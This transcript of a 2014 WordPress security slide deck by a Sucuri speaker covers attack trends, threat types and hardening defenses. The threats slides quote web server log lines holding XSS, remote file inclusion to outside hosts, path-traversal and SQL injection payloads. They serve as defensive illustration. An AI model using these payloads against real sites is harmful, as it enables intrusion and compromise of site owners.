Website Security - Latest and Greatest (WordPress 2014)

of 62 /62
Latest and Greatest Website Security (WordPress)

description

This presentation focuses on three elements - Trends, Threats and Defenses. It leverages the latests data from some of the top Information Security companies out there (i.e., Symantec, Websense, etc..). It does not go over the typical 10 things, instead it focuses on broad Information Security concepts and principles that many website owners don't account for.

Transcript of Website Security - Latest and Greatest (WordPress 2014)

Page 1: Website Security - Latest and Greatest (WordPress 2014)

Latest and Greatest Website Security (WordPress)

Page 2: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

# WHOIS PEREZBOX

Sucuri, Inc. @sucuri_security @perezbox

Specialization: Website Security Incident Handling

Special Interests: Brazilian JiuJitsu

Tony Perez | @perezbox | @sucuri_security 2

Page 3: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Website Security Company

Global Operations

Platform Agnostic (i.e., Joomla, WordPress, etc..)

Scan 2M Unique Domains a Month

Block 4M web attacks a Month

Remediate 400 – 500 websites a day

Signature / Heuristic Based

24/7 operations

Tony Perez | @perezbox | @sucuri_security 3

Page 4: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Today’s Discussion

Trends Threats Defenses

Tony Perez | @perezbox | @sucuri_security 4

Page 5: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Trends

Tony Perez | @perezbox | @sucuri_security 5

Page 6: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

2013 – Year of the Mega Breach

Tony Perez | @perezbox | @sucuri_security 6

Data Breaches (Millions)

2011 2013

~230%

Page 7: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Anatomy of Malicious Websites

Malicious WebsitesLegitimate Websites

Tony Perez | @perezbox | @sucuri_security 7

85%

Page 8: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Legitimate Websites

Not-ExploitableExploitable

77%

Tony Perez | @perezbox | @sucuri_security 8

1 in 8 - Critical Vulnerability

Page 9: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Ransomware Explosion

Ransomware

2012 2013

Tony Perez | @perezbox | @sucuri_security 9

~500%

Page 10: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Malware Distribution

Remot

e iFr

ame I

ncludes

Remot

e Jav

aScri

pt Inclu

des

SPAM Injec

tions

Obfusc

ated

/ En

coded

Java

Script

Conditi

onal

Redire

cts

Deface

ments

Other

26%

19%16% 14%

11%

4%

10%

Tony Perez | @perezbox | @sucuri_security 10

Page 11: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Malicious Links

Tony Perez | @perezbox | @sucuri_security 11

Malicious

Links

Social Media

Email Links Website

Text Messag

es

Page 12: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Spear Phishing / Phishing Increase

Tony Perez | @perezbox | @sucuri_security 12

93% Increase in 2013

Page 13: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Beyond The Application Layer

Tony Perez | @perezbox | @sucuri_security 13

Darkleech

Cdork (Apache

)

Ebury (SSH)

Email Server (SPAM)

Going Deeper than the application layer, targeting the server.

Server Polymorphism – a.k.a highly adaptive / sophistication

Heartbleed

(OpenSSL)

Page 14: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

HeartBleed

Tony Perez | @perezbox | @sucuri_security 14

Page 15: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Search Engine Poisoning (SEP) Pharmacy Payday Loans

Tony Perez | @perezbox | @sucuri_security 16

Page 16: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Automated Attacks

WP-ADMIN

Themes /

PluginsPayloa

d

Tony Perez | @perezbox | @sucuri_security 17

Exploiting Access Control

Page 17: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Soup Kitchen Servers

Tony Perez | @perezbox | @sucuri_security 18

Site 1

Site 2Site 3

Site 4

Cross-Site Contamination

Page 18: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Drive By Downloads

Tony Perez | @perezbox | @sucuri_security 19

Page 19: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Targeting Zero Days

Tony Perez | @perezbox | @sucuri_security 20

Page 20: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Targeting Mobile Devices

Tony Perez | @perezbox | @sucuri_security 21

Page 21: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Google is On Fire

Tony Perez | @perezbox | @sucuri_security 22

Page 22: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Brute Force Attacks

Tony Perez | @perezbox | @sucuri_security 23

Page 23: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Denial of Service (DOS)

Tony Perez | @perezbox | @sucuri_security 24

Page 24: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Brute Force vs Denial of Service

Tony Perez | @perezbox | @sucuri_security 25

Page 25: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Trust Erosion

Tony Perez | @perezbox | @sucuri_security 26

Page 26: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

There’s a Tool for that Explosion in the Malware

as a Service (MaaS) trade Yes, pay someone to hack

for you

Different tools to break in and generate payloads Brute force and

vulnerability exploits Malware Payloads

Blackhole Exploit Author Arrested

Tony Perez | @perezbox | @sucuri_security 27

Page 27: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Exploit kit Market in Flux

25%

22%

9%1%10%

5%

11%

10%5% Neutrino

Unknown KitRedkitSweetOrangeStyxGlazunov/SibhostNuclearBlackhole/CoolOther

Tony Perez | @perezbox | @sucuri_security 28

Page 28: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Don’t Worry, Everyone is a “Target”

Tony Perez | @perezbox | @sucuri_security 29

Page 29: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Threats

Tony Perez | @perezbox | @sucuri_security 30

Page 30: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Anatomy of Web Attacks

Recon Identify Attack Decisions Sustain

Tony Perez | @perezbox | @sucuri_security 31

Use for malware? Burrow into network? Steal data?

What kind of website do you have?

Page 31: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Five Stages of an Attack

Tony Perez | @perezbox | @sucuri_security 32

Page 32: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Cross-Site Scripting (XSS)

Tony Perez | @perezbox | @sucuri_security 33

38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268

Stored Reflective

Page 33: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

iFrame Injections

Tony Perez | @perezbox | @sucuri_security 34

Page 34: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”

83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”

82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Remote / Local File Inclusion (RFI)

Tony Perez | @perezbox | @sucuri_security 35

Page 35: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

SQL Injection

Tony Perez | @perezbox | @sucuri_security 36

62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”

Page 36: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Spear Phishing

Tony Perez | @perezbox | @sucuri_security 37

Page 37: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Backdoors

Tony Perez | @perezbox | @sucuri_security 38

Page 38: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Free is not always Free http://blog.sucuri.net/2014/03/unmasking-free-pr

emium-wordpress-plugins.html

Tony Perez | @perezbox | @sucuri_security 39

- SEOPresser- Payload located: wp-content/plugins/seo-pressor(gratuit)- File: central.class.php

- Flat Skins Pack Extension- Payload located: wp-content/restrict-content-pro/includes/- File: sidebar.php

- Restrict Content Pro- Paylaod located: wp-content/ubermenu-skins-flat

Page 39: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

What’s all this mean?

Brand Reputation Legal Implications Impact to Sales Blacklisted by

Search Engines Blacklisted by

Payment processors Worst Day Of your

Life

Tony Perez | @perezbox | @sucuri_security 40

Page 40: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Defenses

Tony Perez | @perezbox | @sucuri_security 41

Page 41: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Our Insight Come From

Sucuri properties suffer: ~125,000 web based

attacks a month on average

~4,000 attacks a day▪ This spikes on occasion

Doesn’t include server level attacks

All flavors of attacks

Tony Perez | @perezbox | @sucuri_security 42

Page 42: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Areas to Focus On

Principles Access Control Vulnerabilities

Tony Perez | @perezbox | @sucuri_security 43

Page 43: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Manage your expectations

“It’s about risk reduction… risk will never be zero…”

Tony Perez | @perezbox | @sucuri_security 44

Page 44: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Defense in Depth

“…a concept in which multiple layers of security controls (defenses) are placed throughout an information

technology (IT) system. Its intent is to provide redundancy in the event a

security control fails or a vulnerability is exploited…”

Tony Perez | @perezbox | @sucuri_security 45

Page 45: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Access – P@ssw0rd

Passwords

Tony Perez | @perezbox | @sucuri_security 46

Complex – Long - Unique

Page 46: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Sample Usernames Used

Tony Perez | @perezbox | @sucuri_security 47

Page 47: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Sample Passwords Used

Tony Perez | @perezbox | @sucuri_security 48

Page 48: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Access Control

Tony Perez | @perezbox | @sucuri_security 49

• https://getclef.com/ | @getclef

Page 49: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Principle of Least Privileged

“requires that in a particular abstraction layer of a computing

environment, every module (such as a process, a user or a program

depending on the subject) must be able to access only the information

and resources that are necessary for its legitimate purpose.”

Tony Perez | @perezbox | @sucuri_security 50

Page 50: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Disable PHP Execution

Tony Perez | @perezbox | @sucuri_security 51

PHP Execution, disable it:

/wp-includes /wp-content /themes /plugins /uploads

<Files *.php>Deny from all</Files>

Page 51: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Disable Plugin / Theme Editor WP-CONFIG File Modification

#Disable Plugin / Theme EditorDefine(‘DISALLOW_FILE_EDIT’,true);

Tony Perez | @perezbox | @sucuri_security 52

Page 52: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Ensure Integrity of Connection

Tony Perez | @perezbox | @sucuri_security 53

• https://www.getcloak.com/ | @getcloak

Page 53: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Please Backup

Tony Perez | @perezbox | @sucuri_security 54

Page 54: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Stay Current (Update)

Tony Perez | @perezbox | @sucuri_security 55

NOT THAT HARD!!!!

Page 55: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Software Vulnerabilities Stay current with the latest

vulnerabilities: Secure -

http://wordpress.org/plugins/secure/

Tony Perez | @perezbox | @sucuri_security 56

Page 56: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Brute Force Protection Local Protection

https://bruteprotect.com/ | @BruteProtect

Tony Perez | @perezbox | @sucuri_security 57

Page 57: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Website Firewalls

Tony Perez | @perezbox | @sucuri_security 58

• Stay ahead of Software Vulnerabilities

Page 58: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Biggest Weakness / Vulnerability

Tony Perez | @perezbox | @sucuri_security 59

Page 59: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Simple Steps to Risk Reduction

Tony Perez | @perezbox | @sucuri_security 60

1. Employ Website Firewall

2. Don’t let WordPress write to itself

3. Filter Access by IP 4. Use a dedicated

server / VPS5. Monitor all Activity

(Logging)6. Enable SSL for

transactions7. Keep environment

current (patched)8. No Soup Kitchen

Servers

Ideal implementations:

1. Connect Securely – SFTP / SSH

2. Authentication Keys / wp-config

3. Use Trusted Sources4. Use a local Antivirus – MAC

too5. Permissions - D 755 | F 6446. Least Privileged Principles7. Accountability8. Backups – Include Database

The Bare Minimum:

Page 60: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

10 Stupid Mindsets / Actions1. Fix index.php file and assume all is fine.

2. Panic your way into WordPress Forums after hack.

3. Don’t worry about updating.

4. Trust third-party extensions.

5. Apply all upgrades on live site.

6. Install and forget, all is well with your new site.

7. Use the same username and password for everything.

8. Don’t waste time making security adjustments to PHP and settings.

9. No regular backups required.

10. Use the cheapest host.

Tony Perez | @perezbox | @sucuri_security 61

Page 61: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Notable Resources

Tony Perez | @perezbox | @sucuri_security 62

Name Tool

Sucuri Blog http://blog.sucuri.net

Sucuri TV http://sucuri.tv

Malware Scanner http://sitecheck.sucuri.net

Malware Scanner http://unmaskparasites.com

Badware Busters https://badwarebusters.org

Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress

Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked

WordPress Hardening http://codex.wordpress.org/Hardening_WordPress

Page 62: Website Security - Latest and Greatest (WordPress 2014)

04/07/2023

Questions?

Tony Perez | @perezbox | @sucuri_security 63

Sucuri, Inc.Tony Perez

http://sucuri.nethttp://blog.sucuri.net

@perezbox | @sucuri_security

Slides: http://www.slideshare.net/perezbox/website-security-its-about-the-basics-wordpress-

2014